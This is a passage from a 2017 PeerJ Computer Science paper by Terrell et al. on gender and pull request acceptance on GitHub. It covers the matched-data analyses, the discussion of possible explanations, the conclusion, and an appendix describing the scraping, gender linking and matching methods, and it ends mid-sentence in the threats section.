that women’s acceptance rates are higher than men’s for almost every programming language. The one exception is .m, which indicates Objective-C and Matlab, for which the difference is not statistically significant. Is a woman’s pull request accepted more often because she appears to be a woman? Another explanation as to why women’s pull requests are accepted at a higher rate would be what McLoughlin calls Type III bias: ‘‘the singling out of women by gender with the intention to help’’ (McLoughlin, 2005). In our context, project owners may be biased towards wanting to help women who submit pull requests, especially outsiders to the project. In contrast, male outsiders without this benefit may actually experience the opposite effect, as distrust and bias can be stronger in stranger-to-stranger interactions (Landy, 2008). Thus, we expect that women who can be perceived as women are more likely to have their pull requests accepted than women whose gender cannot be easily inferred, especially when compared to male outsiders. We evaluate this hypothesis by comparing pull request acceptance rate of developers who have gender-neutral GitHub profiles and those who have gendered GitHub profiles. We define a gender-neutral profile as one where a gender cannot be readily inferred from their profile. Figure 1 gives an example of a gender-neutral GitHub user, ‘‘akofink’’, who Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 11/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 60% 70% 80% 90% .js * .rb * .py * .java * .php * .cpp * .cs * .c * .go * .m A cc e p ta n ce R a te Women Men 60% 70% 80% 90% .md .html * .xml .json * .css * .txt * .yml .rst * .markdown .podspec A cc e p ta n ce R a te A B Figure 5 Pull request acceptance rate by file type, for programming languages (A) and non- programming languages (B). uses an identicon, an automatically generated graphic, and does not have a gendered name that is apparent from the login name. Likewise, we define a gendered profile as one where the gender can be readily inferred from the image or the name. Figure 1 also gives an example of a gendered profile; the profile of ‘‘JustinAMiddleton’’ is gendered because it uses a login name (Justin) commonly associated with men, and because the image depicts a person with masculine features (e.g., pronounced brow ridge (Brown & Perrett, 1993)). Clicking on a user’s name in pull requests reveals their profile, which may contain more information such as a user-selected display name (like ‘‘Justin Middleton’’). Identifiable analysis To obtain a sample of gendered and gender-neutral profiles, we used a combination of automated and manual techniques. For gendered profiles, we included GitHub users who used a profile image rather than an identicon and that Vasilescu and colleagues’ tool could confidently infer a gender from the user’s name (Vasilescu, Capiluppi & Serebrenik, 2014). Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 12/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 60% 70% 80% 90% Gender−Neutral Gendered A cc e p ta n ce R a te Insiders Gender−Neutral Gendered Women Men Outsiders A B Figure 6 Pull request acceptance rate by gender and perceived gender, with 95% Clopper–Pearson confidence intervals, for insiders (A) and outsiders (B). For gender-neutral profiles, we included GitHub users that used an identicon, that the tool could not infer a gender for, and that a mixed-culture panel of judges could not guess the gender for. While acceptance rate results so far have been robust to differences between insiders (people who are owners or collaborators of a project) versus outsiders (everyone else), for this analysis, there is a substantial difference between the two, so we treat each separately. Figure 6 shows the acceptance rates for men and women when their genders are identifiable versus when they are not, with pull requests submitted by insiders on the left and pull requests submitted by outsiders on the right. Identifiable results For insiders, we observe little evidence of bias when we compare women with gender-neutral profiles and women with gendered profiles, since both have similar acceptance rates. This can be explained by the fact that insiders likely know each other to some degree, since they are all authorized to make changes to the project, and thus may be aware of each others’ gender. For outsiders, we see evidence for gender bias: women’s acceptance rates drop by 12.0% when their gender is identifiable, compared to when it is not (χ2(df =1,n=16,258)= 158,p <.001). There is a smaller 3.8% drop for men (χ2(df =1,n=608,764)=39,p < .001). Women have a higher acceptance rate of pull requests overall (as we reported earlier), but when they are outsiders and their gender is identifiable, they have a lower acceptance rate than men. Are acceptance rates different if we control for covariates? In analyses of pull request acceptance rates up until this point, covariates other than the variable of interest (gender) may also contribute to acceptance rates. We have previously Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 13/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 shown an imbalance in covariate distributions for men and women (e.g., number of projects contributed to and number of changes made) and this imbalance may confound the observed gender differences. In this section, we re-analyze acceptance rates while controlling for these potentially confounding covariates using propensity score matching, a technique that supports causal inference by transforming a dataset from a non-randomized field study into a dataset that ‘‘looks closer to one that would result from a perfectly blocked (and possibly randomized) experiment’’ (Ho et al., 2011). That is, by making gender comparisons between subjects having the same propensity scores, we are able to remove the confounding effects, giving stronger evidence that any observed differences are primarily due to gender bias. While full details of the matching procedure can be found in the Appendix, in short, propensity score matching works by matching data from one group to similar data in another group (in our case, men’s and women’s pull requests), then discards the data that do not match. This discarded data represent outliers, and thus the results from analyzing matched data may differ substantially from the results from analyzing the original data. The advantage of propensity score matching is that it controls for any differences we observed earlier that are caused by a measured covariate, rather than gender bias. One negative side effect of matching is that statistical power is reduced because the matched data are smaller than from the original dataset. We may also observe different results than in the larger analysis because we are excluding certain subjects from the population having atypical covariate value combinations that could influence the effects in the previous analyses. Figure 7 shows acceptance using matched data for all pull requests, for just pull requests from outsiders, and for just pull requests on projects that are open source (OSS) licenses. Asterisks (*) indicate that each difference is statistically significant using a chi-squared test, though the magnitude of the difference between men and women is smaller than for unmatched data. Figure 8 shows acceptance rates for matched data, analogous to Fig. 5. We calculate statistical significance with a chi-squared test, with a Benjamini–Hochberg correction (Benjamini & Hochberg, 1995). For programming languages, acceptance rates for three (Ruby, Python, and C ++) are significantly higher for women, and one (PHP) is significantly higher for men. Figure 9 shows acceptance rates for matched data by pull request index, that is, for each user’s first pull request, second and third pull request, fourth through seventh pull request, and so on. We perform chi-squared tests and Benjamini–Hochberg corrections here as well. Compared to Fig. 3, most differences between genders diminish to the point of non-statistical significance. From Fig. 9, we might hypothesize that the overall difference in acceptance rates between genders is due to just the first pull request. To examine this, we separate the pull request acceptance rate into: • One-Timers: Pull requests from people who only ever submit one pull request. • Regulars’ First: First pull requests from people who go on to submit other pull requests. • Regulars’ Rest: All other (second and beyond) pull requests. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 14/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 1For the sake of completeness, the result of that matching process is included in the Supplemental Files. 60% 70% 80% 90% all * Outsiders * OSS * A cc e p ta n ce R a te Women Men Figure 7 Acceptance rates for men and women for all data, outsiders, and open source projects using matched data. Figure 10 shows the results. Overall, women maintain a significantly higher acceptance rate beyond the first pull request, disconfirming the hypothesis. We next investigate acceptance rate by gender and perceived gender using matched data. Here we match slightly differently, matching on identifiability (gendered, unknown, or neutral) rather than use of an identicon. Unfortunately, matching on identifiability (and the same covariates described in this section) reduces the sample size of gender neutral pulls by an order of magnitude, substantially reducing statistical power.1 Consequently, here we relax the matching criteria by broadening the equivalence classes for numeric variables. Figure 11 plots the result. For outsiders, while men and women perform similarly when their genders are neutral, when their genders are apparent, men’s acceptance rate is 1.2% higher than women’s (χ2(df =1,n=419,411)=7,p<.01). How has this matched analysis of the data changed our findings? Our observation about overall acceptance rates being higher for women remains, although the difference is smaller. Our observation about womens’ acceptance rates being higher than mens’ for all programming languages is now mixed; instead, women’s acceptance rate is significantly higher for three languages, but significantly lower for one language. Our observation that womens’ acceptance rates continue to outpace mens’ becomes less clear. Finally, for outsiders, although gender-neutral women’s acceptance rates no longer outpace men’s to a Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 15/30 http://dx.doi.org/10.7717/peerj-cs.111#supplemental-information https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 60% 70% 80% 90% .js .rb * .py * .java .php * .cpp * .cs .c .go .m A cc e p ta n ce R a te Women Men 60% 70% 80% 90% .md .html * .xml * .json .txt .yml .rst .markdown .podspec A cc e p ta n ce R a te Women Men A B Figure 8 Acceptance rates for men and women using matched data by file type for programming lan- guages (A) and non-programming languages (B). statistically significant extent, men’s pull requests continue to be accepted more often than women’s when the contributor’s gender is apparent. DISCUSSION Why do differences exist in acceptance rates? To summarize this paper’s observations: 1. Women are more likely to have pull requests accepted than men. 2. Women continue to have high acceptance rates as they do pull requests on more projects. 3. Women’s pull requests are less likely to serve an documented project need. 4. Women’s changes are larger. 5. Women’s acceptance rates are higher for some programming languages. 6. Men outsiders’ acceptance rates are higher when they are identifiable as men. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 16/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 60% 70% 80% 90% 1−1 PRs * 2−3 PRs 4−7 PRs 8−15 PRs 16−31 PRs 32−63 PRs 64−127 PRs A cc e p ta n ce R a te Women Men Figure 9 Pull request acceptance rate over time using matched data. We next consider several alternative theories that may explain these observations as a whole. Given observations 1–5, one theory is that a bias against men exists, that is, a form of reverse discrimination. However, this theory runs counter to prior work (e.g., Nafus, 2012), as well as observations 6. Another theory is that women are taking fewer risks than men. This theory is consistent with Byrnes’ meta-analysis of risk-taking studies, which generally find women are more risk-averse than men (Byrnes, Miller & Schafer, 1999). However, this theory is not consistent with observation 4, because women tend to change more lines of code, and changing more lines of code correlates with an increased risk of introducing bugs (Mockus & Weiss, 2000). Another theory is that women in open source are, on average, more competent than men. In Lemkau’s review of the psychology and sociology literature, she found that women in male-dominated occupations tend to be highly competent (Lemkau, 1979). This theory is consistent with observations 1–5. To be consistent with observations 6, we need to explain why women’s pull request acceptance rate drops when their gender is apparent. An addition to this theory that explains observation 6, and the anecdote described in the introduction, is that discrimination against women does exist in open source. Assuming this final theory is the best one, why might it be that women are more competent, on average? One explanation is survivorship bias: as women continue their formal and informal education in computer science, the less competent ones may change Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 17/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 60% 70% 80% 90% One−Timers Regulars' First Regulars' Rest * A cc e p ta n ce R a te Women Men Figure 10 Acceptance rates for men and women broken down by category. 60% 70% 80% 90% Gender−Neutral * Gendered A cc e p ta n ce R a te Insiders Gender−Neutral Gendered * Women Men Outsiders A B Figure 11 Pull request acceptance rate by gender and perceived gender, using matched data. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 18/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 2Calculated using the chies function in the compute.es R package (https://cran.r- project.org/web/packages/compute.es/ compute.es.pdf). fields or otherwise drop out. Then, only more competent women remain by the time they begin to contribute to open source. In contrast, less competent men may continue. While women do switch away from STEM majors at a higher rate than men, they also have a lower drop out rate then men (Chen, 2013), so the difference between attrition rates of women and men in college appears small. Another explanation is self-selection bias: the average woman in open source may be better prepared than the average man, which is supported by the finding that women in open source are more likely to hold Master’s and PhD degrees (Arjona-Reina, Robles & Dueas, 2014). Yet another explanation is that women are held to higher performance standards than men, an explanation supported by Gorman & Kmec (2007) analysis of the general workforce, as well as Heilman and colleagues’ (2004) controlled experiments. Are the differences meaningful? We have demonstrated statistically significant differences between men’s and women’s pull request acceptance rates, such as that, overall, women’s acceptance rates are 4.1% higher than men’s. We caution the reader from interpreting too much from statistical significance; for big data studies such as this one, even small differences can be statistically significant. Instead, we encourage the reader to examine the size of the observed effects. We next examine effect size from two different perspectives. Using our own data, let us compare acceptance rate to two other factors that correlate with pull request acceptance rates. First, the slope of the lines in Fig. 3, indicate that, generally, as developers become more experienced, their acceptance rates increases fairly steadily. For instance, as experience doubles from 16 to 32 pull requests for men, pull acceptance rate increases by 2.9%. Second, the larger a pull request is, the less likely it is to be accepted (Gousios, Pinzger & Deursen, 2014). In our pull request data, for example, increasing the number of files changed from 10 to 20 decreases the acceptance rate by 2.0%. Using others’ data, let us compare our effect size to effect sizes reported in other studies of gender bias. Davison and Burke’s meta-analysis of sex discrimination found an average Pearson correlation of r = .07, a standardized effect size that represents the linear dependence between gender and job selection (Davison & Burke, 2000). In comparison, our 4.1% overall acceptance rate difference is equivalent to r = .02.2 Thus, the effect we have uncovered is only about a quarter of the effect in typical studies of gender bias. CONCLUSION In closing, as anecdotes about gender bias persist, it is imperative that we use big data to better understand the interaction between genders. While our big data study does not prove that differences between gendered interactions are caused by bias among individuals, combined with qualitative data about bias in open source (Nafus, 2012), the results are troubling. Our results show that women’s pull requests tend to be accepted more often than men’s, yet women’s acceptance rates are higher only when they are not identifiable as women. In the context of existing theories of gender in the workplace, plausible explanations include Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 19/30 https://cran.r-project.org/web/packages/compute.es/compute.es.pdf https://cran.r-project.org/web/packages/compute.es/compute.es.pdf https://cran.r-project.org/web/packages/compute.es/compute.es.pdf https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 the presence of gender bias in open source, survivorship and self-selection bias, and women being held to higher performance standards. While bias can be mitigated—such as through ‘‘bias busting’’ workshops (http: //www.forbes.com/sites/ellenhuet/2015/11/02/rise-of-the-bias-busters-how-unconscious- bias-became-silicon-valleys-newest-target), open source codes of conduct (http: //contributor-covenant.org) and blinded interviewing (https://interviewing.io)— the results of this paper do not suggest which, if any, of these measures should be adopted. More simply, we hope that our results will help the community to acknowledge that biases are widespread, to reevaluate the claim that open source is a pure meritocracy, and to recognize that bias makes a practical impact on the practice of software development. ACKNOWLEDGEMENTS Special thanks to Denae Ford for her help throughout this research project. Thanks to the Developer Liberation Front for their reviews of this paper. For their helpful discussions, thanks to Tiffany Barnes, Margaret Burnett, Tim Chevalier, Aaron Clauset, Julien Couvreur, Prem Devanbu, Ciera Jaspan, Saul Jaspan, David Jones, Jeff Leiter, Ben Livshits, Titus von der Malsburg, Peter Rigby, David Strauss, Bogdan Vasilescu, and Mikael Vejdemo- Johansson. For their helpful critiques during the peer review process, thanks to Lynn Conway, Caroline Simard, and the anonymous reviewers. APPENDIX: MATERIALS AND METHODS GitHub scraping An initial analysis of GHTorrent pull requests showed that our pull request merge rate was significantly lower than that presented in prior work on pull requests (Gousios, Pinzger & Deursen, 2014). We found a solution to the problem that calculated pull request status using a different technique, which yielded a pull request merge rate comparable to prior work. However, in a manual inspection of pull requests, we noticed that several calculated pull request statuses were different than the statuses indicated on the http://github.com website. As a consequence, we wrote a web scraping tool that automatically downloaded the pull request HTML pages, parsed them, and extracted data on status, pull request message, and comments on the pull request. We performed this process for all pull requests submitted by GitHub users that we had labeled as either a man or woman. In the end, the pull request acceptance rate was 74.8% for all processed pull requests. We determined whether a pull requestor was an insider or an outsider during our scraping process because the data was not available in the GHTorrent dataset. We classified a user as an insider when the pull request explicitly listed the person as a collaborator or owner (https://help.github.com/articles/what-are-the-different-access-permissions/#user- accounts), and classified them as an outsider otherwise. This analysis has inaccuracies because GitHub users can change roles from outsider to insider and vice-versa. As an example, about 5.9% of merged pull requests from both outsider female and male users weremergedby theoutsiderpull-requestorthemselves, whichisnotpossible, sinceoutsiders Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 20/30 https://peerj.com http://www.forbes.com/sites/ellenhuet/2015/11/02/rise-of-the-bias-busters-how-unconscious-bias-became-silicon-valleys-newest-target http://www.forbes.com/sites/ellenhuet/2015/11/02/rise-of-the-bias-busters-how-unconscious-bias-became-silicon-valleys-newest-target http://www.forbes.com/sites/ellenhuet/2015/11/02/rise-of-the-bias-busters-how-unconscious-bias-became-silicon-valleys-newest-target http://contributor-covenant.org http://contributor-covenant.org https://interviewing.io http://github.com https://help.github.com/articles/what-are-the-different-access-permissions/#user-accounts https://help.github.com/articles/what-are-the-different-access-permissions/#user-accounts http://dx.doi.org/10.7717/peerj-cs.111 by definition do not have the authority to self-merge. We emailed such an outsider, who indicated that, indeed, she was an insider when she made that pull request. We attempted to mitigate this problem by using a technique similar to that used in prior work (Gousios, Pinzger & Deursen, 2014; Yu et al., 2015). From contributors that we initially marked as outsiders, for a given pull request on a project, we instead classified them as insiders when they met any of three conditions. The first condition was that they had closed an issue on the project within 90 days prior to opening the given pull request. The second condition was that they had merged the given pull request or any other pull request on the project in the prior 90 days. The third condition was that they had closed any pull request that someone else had opened in the prior 90 days. Meeting any of these conditions implies that, even if the contributor was an outsider at the time of our scraping, they were probably an insider at the time of the pull request. Gender linking To evaluate gender bias on GitHub, we first needed to determine the genders of GitHub users. Our technique uses several steps to determine the genders of GitHub users. First, from the GHTorrent data set, we extract the email addresses of GitHub users. Second, for each email address, we use the search engine in the Google+ social network to search for users with that email address. The search works for both Google users’ email addresses (@gmail.com), as well as other email addresses (such as @ncsu.edu). Third, we parse the returned users’ ‘About’ page to scrape their gender. Finally, we include only the genders ‘Male’ and ‘Female’ (334,578 users who make pull requests) because there were relatively few other options chosen (159 users). We also automated and parallelized this process. This technique capitalizes on several properties of the Google+ social network. First, if a Google+ user signed up for the social network using an email address, the search results for that email address will return just that user, regardless of whether that email address is publicly listed or not. Second, signing up for a Google account currentlyrequires you to specify a gender (though ‘Other’ is an option) (https://accounts.google.com/SignUp), and, in our discussion, we interpret their use of ‘Male’ and ‘Female’ in gender identification (rather than sex) as corresponding to our use of the terms ‘man’ and ‘woman’. Third, when Google+ was originally launched, gender was publicly visible by default (http://latimesblogs.latimes.com/technology/2011/07/google- plus-users-will-soon-be-able-to-opt-out-of-sharing-gender.html). Merged pull requests Throughout this study, we measure pull requests that are accepted by calculating developers’ merge rates, that is, the number of pull requests merged divided by the sum of the number of pull requests merged, closed, and still open. We include pull requests still open in the denominator in this calculation because pull requests that are still open could be indicative of a pull requestor being ignored, which has the same practical impact as rejection. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 21/30 https://peerj.com mailto:@gmail.com mailto:@ncsu.edu https://accounts.google.com/SignUp http://latimesblogs.latimes.com/technology/2011/07/google-plus-users-will-soon-be-able-to-opt-out-of-sharing-gender.html http://latimesblogs.latimes.com/technology/2011/07/google-plus-users-will-soon-be-able-to-opt-out-of-sharing-gender.html http://dx.doi.org/10.7717/peerj-cs.111 3This tool was builds on Vasilescu and colleagues’ tool (Vasilescu, Capiluppi & Serebrenik, 2014), but we removed some of Vasilescu and colleagues’ heuristics to be more conservative. Our version of the tool can be found here: https: //github.com/DeveloperLiberationFront/ genderComputer. Project licensing To determine whether a project uses an open source license, we used an experimental GitHub API that uses heuristics to determine a project’s license (https://developer.github. com/v3/licenses/). We classified a project (and thus the pull request on that project) as open source if the API reported a license that the Open Source Initiative considers in compliance with the Open Source Definition (https://opensource.org/licenses), which were afl-3.0, agpl-3.0, apache-2.0, artistic-2.0, bsd-2-clause, bsd-3-clause, epl-1.0, eupl-1.1, gpl-2.0, gpl-3.0, isc, lgpl-2.1, lgpl-3.0, mit, mpl-2.0, ms-pl, ms-rl, ofl-1.1, and osl-3.0. Projects were not considered open source if the API did not return a license for a project, or the license was bsd-3-clause-clear, cc-by-4.0, cc-by-sa-4.0, cc0-1.0, other, unlicense, or wtfpl. Determining gender neutral and gendered profiles To determine gendered profiles, we first parsed GitHub profile pages to determine whether each user was using a profile image or an identicon. Of the users who performed at least one pull request, 213,882 used a profile image and 104,648 used an identicon. We then ran display names and login names through a gender inference program, which maps a name to a gender.3 We classified a GitHub profile as gendered if each of the following were true: • a profile image (rather than an identicon) was used, and • the gender inference tool output a gender at the highest level of confidence (that is, ‘male’ or ‘female,’ rather than ‘mostly male,’ ‘mostly female,’ or ‘unknown’). We classified profile images as identicons using ImageMagick (http://www.graphicsmagick.org/GraphicsMagick.html), looking for an identicon-specific file size, image dimension, image class, and color depth. In an informal inspection into profile images, we found examples of non-photographic images that conveyed gender cues, so we did not attempt to distinguish between photographic and non-photographic images when classifying profiles as gendered. To classify profiles as gender neutral, we added a manual step. Given a GitHub profile that used an identicon (thus, a gender could not be inferred from a profile image) and a name that the gender inference tool classified as ‘unknown’, we manually verified that the profile could not be easily identified as belonging to a specific gender. We did this in two phases. In the first phase, we assembled a panel of 3 people to evaluate profiles for 10 s each. The panelists were a convenience sample of graduate and undergraduate students from North Carolina State University. Panelists were of American (man), Chinese (man), and Indian (woman) origin, representative of the three most common nationalities on GitHub. We used different nationalities because we wanted the panel to be able to identify, if possible, the genders of GitHub usernames with different cultural origins. In the second phase, we eliminated two inefficiencies from the first phase: (a) because the first panel estimated that for 99% of profiles, they only looked at login names and display names, we only showed this information to the second panel, and (b) because the first panel found 10 s was usually more time than was necessary to assess gender, we allowed panelists at the second phase to assess names at their own pace. Across both phases, panelists were instructed to signal if they could identify the gender of the GitHub profile. To estimate Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 22/30 https://github.com/DeveloperLiberationFront/genderComputer https://github.com/DeveloperLiberationFront/genderComputer https://github.com/DeveloperLiberationFront/genderComputer https://peerj.com https://developer.github.com/v3/licenses/ https://developer.github.com/v3/licenses/ https://opensource.org/licenses http://www.graphicsmagick.org/GraphicsMagick.html http://dx.doi.org/10.7717/peerj-cs.111 panelists’ confidence, we considered using a threshold like ‘‘90% confident of the gender,’’ but found that this was too ambiguous in pilot panels. Instead, we instructed panelists to signal if they would be comfortable addressing the GitHub user as ‘Mister’ or ‘Miss’ in an email, given the only thing they knew about the user was their profile. We considered a GitHub profile as gender neutral if all of the following conditions were met: • an identicon (rather than a profile image) was used, • the gender inference tool output a ‘unknown’ for the user’s login name and display name, and • none of the panelists indicated that they could identify the user’s gender. Rather than asking a panel to laboriously evaluate every profile for which the first two criteria applied, we instead asked panelists to inspect a random subset. Across both panels, panelists inspected 3,000 profiles of roughly equal numbers of women and men. We chose the number 3,000 by doing a rough statistical power analysis using the results of the first panel to determine how many profiles panelists should inspect during the second panel to obtain statistically significant results. Of the 3,000, panelists eliminated 409 profiles for which at least one panelist could infer a gender. Matching procedure To enable more confident causal inferences about the effect of gender, we used propensity score matching to remove the effect of confounding factors from our acceptance rate analyses. In our analyses, we used men as the control group and women as the treatment group. We treated each pull request as a data point. The covariates we matched were number of lines added, number of lines removed, number of commits, number of files changed, pull index (the creator’s nth pull request), number of references to issues, license (open source or not), creator type (owner, collaborator, or outsider), file extension, and whether the pull requestor used an identicon. We excluded pull requests for which we were missing data for any covariate. We used the R library MatchIt (Ho et al., 2011). Although MatchIt offers a variety of matching techniques, such as full matching and nearest neighbor, we found that only the exact matching technique completed the matching process, due to our large number of covariates and data points. With exact matching, each data point in the treatment group must match exactly with one or more data points in the control group. This presents a problem for covariates with wide distributions (such as lines of code) because it severely restricts the technique’s ability to find matches. For instance, if a woman made a pull request with 700 lines added and a man made a pull request with 701 lines added that was otherwise identical (same number of lines removed, same file extension, and so on), these two data points would not be matched and excluded from further analysis. Consequently, we pre-processed each numerical variable into the floor of the log2 of it. Thus, for example, both 700 and 701 are transformed into 5, and thus can be exactly matched. After exact matching, the means of all covariates are balanced, that is, their weighted means are equal across genders. Raw numerical data, since we transformed it, is not Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 23/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 perfectly balanced, but is substantially more balanced than the original data; each covariate showed a 96% or better balance improvement. Finally, as we noted in the matching procedure for gendered and gender-neutral contributors, to retain reasonable sample sizes, we relaxed the matching criteria by broadening the equivalence classes for numeric variables. Specifically, for lines added, lines removed, commits, files changed, pull index, and references, we transformed the data using log10 rather than log2. Missing data In some cases, data were missing when we scraped the web to obtain data to supplement the GHTorrent data. We describe how we dealt with these data here. First, information on file types was missing for pull requests that added or deleted more than 1,000 lines. The problem was that GitHub does not include file type data on initial page response payloads for large changes, presumably for efficiency reasons. This missing data affects the results of the file type analysis and the propensity score matching analysis; in both cases, pull requests of over 1,000 lines added or deleted are excluded. Second, when retrieving GitHub user images, we occasionally received abnormal server response errors, typically in the form of HTTP 404 errors. Thus, we were unable to determine if the user used a profile image or identicon in 10,458 (3.2% of users and 2.0% of pull requests). We excluded these users and pull requests when analyzing data on gendered users. Third, when retrieving GitHub pull request web pages, we occasionally received abnormal server responses as well. In these cases, we were unable to obtain data on the size of the change (lines added, files changed, etc.), the state (closed, merged, or open), the file type, or the user who merged or closed it, if any. This data comprises 5.15% of pull requests for which we had genders of the pull request creator. These pull requests are excluded from all analyses. Threats One threat to this analysis is that additional covariates, including ones that we could not collect, may influence acceptance rate. One example is that we did not account for the GitHub user judging pull requests, even though such users are central to the pull request process. Another example is pull requestors’ programming experience outside of GitHub. Two covariates we collected, but did not control for, is the project the pull request is made to and the developer deciding on the pull request. We did not control for these covariates because we reasoned that it would discard too many data points during matching. Another threat to this analysis is the existence of robots that interact with pull requests. For example, ‘‘Snoopy Crime Cop’’ (https://github.com/snoopycrimecop) appears to be a robot that has made thousands of pull requests. If such robots used an email address that linked to a Google profile that listed a gender, our merge rate calculations might be skewed unduly. To check for this possibility, we examined profiles of GitHub users that we have genders for and who have made more than 1,000 pull requests. The result was tens of GitHub users, none of whom appeared to be a robot. So in terms of our merge calculation, we are somewhat confident that robots are not substantially influencing the results. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 24/30 https://peerj.com https://github.com/snoopycrimecop http://dx.doi.org/10.7717/peerj-cs.111 Another threat is if men and women misrepresent their genders. If so, we inaccurately label some men on GitHub as women, and vice-versa. While emailing the thousands of pull requestors described in this study to confirm their gender is feasible, doing so is ethically questionable; GHTorrent no longer includes personal email addresses, after GitHub users complained of receiving too many emails from researchers (https: //github.com/ghtorrent/ghtorrent.org/issues/32). Another threat is GitHub developers’ use of aliases (Vasilescu et al., 2015); the same person may appear as multiple GitHub users. Each alias artificially inflates the number of developers shown in the histograms in Fig. 2. Most pull request-level analysis, which represents most of the analyses performed in this paper, are unaffected by aliases that use the same email address. Another threat is inaccuracies in our assessment of whether a GitHub member’s gender is identifiable. First, the threat in part arises from our use the genderComputer program. When genderComputer labels a GitHub profile as belonging to a man, but a human would perceive the user’s profile as belonging to a woman (or vice-versa), then our classification of gendered profiles is inaccurate in such cases. We attempted to mitigate this risk by discarding any profiles in the gendered profile analysis that genderComputer classified with low-confidence. Second, the threat in part arises from our panel. For profiles we labeled as gender-neutral, our panel may not have picked out subtle gender features in GitHub users’ profiles. Moreover, project owners may have used gender signals that we did not; for example, if a pull requestor sends an email to a project owner, the owner may be able to identify the requestor’s gender even though our technique could not. A similar threat is that users who judge pull requests encounter gender cues by searching more deeply than we assume. We assume that the majority of users judging pull requests will look only at the pull request itself (containing the requestor’s username and small profile image) and perhaps the requestor’s GitHub profile (containing username, display name, larger profile image, and GitHub contribution history). Likewise, we assume that very few users judging pull requests will look into the requestor further, such as into their social media profiles. Although judges could have theoretically found requestors’ Google+ profiles using their email addresses (as we did), this seems unlikely for two reasons. First, while pull requests have explicit links to a requestor’s GitHub profile, they do not have explicit links to a requestor’s social media profile; the judge would have to instead seek them out, possibly using a difficult-to-access email address. Second, we claim that our GitHub-to-Google+ linking technique is a novel research technique; assuming that it is also novel in practice, users who judge pull requests would not know about it and therefore would be unable to look up a user’s gender on their Google+ profile. Another threat is that of construct validity, whether we are measuring what we aim to measure. One example is our inclusion of ‘‘open’’ pull requests as a sign of rejection, in addition to the ‘‘closed’’ status. Rather than a sign of rejection, open pull requests may simply have not yet been decided upon. However, these pull requests had been open for at least 126 days, the time between when the last pull request was included in GHTorrent and when we did our web scrape. Given Gousios and colleagues’ (2014) finding that 95% of pull requests are closed within 26 days, insiders likely had ample time to decide on open Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 25/30 https://peerj.com https://github.com/ghtorrent/ghtorrent.org/issues/32 https://github.com/ghtorrent/ghtorrent.org/issues/32 http://dx.doi.org/10.7717/peerj-cs.111 Table 1 Acceptance rates for GitHub users not linked to Google+ (top row) versus those who are linked (bottom rows), by stated gender. Right three columns indicate the percentiles of the number of projects contributed to. Gender category Users Pull requests Acceptance rate 95% Confidence interval User not on Google+ 325,100 3,047,071 71.5% [71.44%,71.54%] User identifies as ‘Male’ on Google+ 312,909 3,168,365 74.2% [74.17%,74.27%] User identifies as ‘Female’ on Google+ 21,510 156,589 79.9% [79.69%,80.09%] User has no gender listed on Google+ 20,024 194,837 74.3% [74.09%,74.48%] User lists ‘Declined to State’ for gender on Google+ 7,484 81,632 73.1% [72.80%,73.41%] User lists other gender on Google+ 159 1,339 73.9% [71.50%,76.27%] Table 2 Percentiles of the number of projects contributed to for GitHub users not linked to Google+ (top row) versus those who are linked (bottom rows), by stated gender. Gender category Users Pull requests 50% 75% 90% User not on Google+ 325,100 3,047,071 1.00 3.00 6.00 User identifies as ‘Male’ on Google+ 312,909 3,168,365 1.00 3.00 7.00 User identifies as ‘Female’ on Google+ 21,510 156,589 1.00 2.00 4.00 User has no gender listed on Google+ 20,024 194,837 1.00 3.00 7.00 User lists ‘Declined to State’ for gender on Google+ 7,484 81,632 1.00 3.00 7.00 User lists other gender on Google+ 159 1,339 2.00 4.00 7.20 pull requests. Another example is whether pull requests that do not link to issues signals that the pull request does not fulfill a documented need. A final example is that a GitHub user might be an insider without being an explicit owner or collaborator; for instance, a user may be well-known and trusted socially, yet not be granted collaborator or owner status, in an effort to maximize security by minimizing a project’s attack surface (Howard, Pincus & Wing, 2005). Another threat is that of external validity; do the results generalize beyond the population studied? While we chose GitHub because it is the largest open source community, other communities such as SourceForge and BitBucket exist, along with other ways to make pull requests, such at through the git version control system directly. Thus, our study provides limited generalizability to other open source ecosystems. Moreover, while we studied a large population of contributors, they represent only part of the total population of developers on GitHub, because not every developer makes their email address public, because not every email address corresponds to a Google+ profile, and because not every Google+ profile lists gender. To understand this threat, Tables 1 and 2 compare GitHub users who we could link to Google+ accounts (the data we used in this paper) against those who do not have Google+ accounts. The top 3 rows are the main ones of interest. In Table 1, we use an exclusively GHTorrent-based calculation of acceptance rate where a pull request is considered accepted if its commit appears in the commit history of the project; we use a different measure of acceptance rate here because we did not parse pull requests made by people not on Google+. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 26/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 In terms of acceptance rate, users not on Google+ have a lower acceptance rate than both males and females on Google+. In terms of number of unique projects contributed to, users not on Google+ contribute to about the same number as men on Google+. A final threat to this research is our own biases as researchers, which may have influenced the results. While it is difficult to control for implicit bias, we can 